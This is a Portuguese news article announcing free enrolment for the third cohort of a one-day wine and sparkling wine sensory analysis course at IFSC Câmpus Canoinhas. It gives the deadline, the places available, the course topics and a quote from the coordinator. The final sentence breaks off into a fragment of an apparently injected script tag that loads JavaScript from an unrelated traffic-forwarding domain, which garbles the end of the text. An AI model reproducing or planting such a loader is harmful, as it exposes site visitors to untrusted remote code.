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Inscrições abertas para 3ª turma do curso de Análise Sensorial de Vinhos e Espumantes

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Profissionais da área gastronômica e apreciadores de vinho têm mais uma oportunidade de fazer o curso de Análise Sensorial de Vinhos e Espumantes, no Câmpus Canoinhas do Instituto Federal de Santa Catarina (IFSC). As inscrições para a terceira turma estão abertas e devem ser feitas até o dia 21 de outubro pela internet. Veja informações no site www.canoinhas.ifsc.edu.br. Podem participar alunos e servidores do IFSC e membros da comunidade externa, com mais de 18 anos. São 15 vagas disponíveis e a seleção será por sorteio.

 

 

O curso é gratuito e acontece no dia 25 de outubro, das 8h às 12h e das 13h30 às 17h30, totalizando oito horas de duração. Durante a parte teórica, serão abordados os seguintes temas: o que é vinho, a arte de servir, aspectos básicos relacionados à enogastronomia e análise visual, olfativa e gustativa. Na parte prática, serão degustados diferentes estilos de vinhos e espumantes.

 

 

O objetivo, segundo o coordenador do curso e sommelier, Douglas André Wurz, é “identificar uma série de características do vinho, propiciando aos participantes o conhecimento necessário para avaliar a cor, os aromas e o gosto do vinho”. Ao tornar a degustação descomplicada e prazerosa, a intenção é democratizar e popularizar o consumo regular e moderado de vinhos…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
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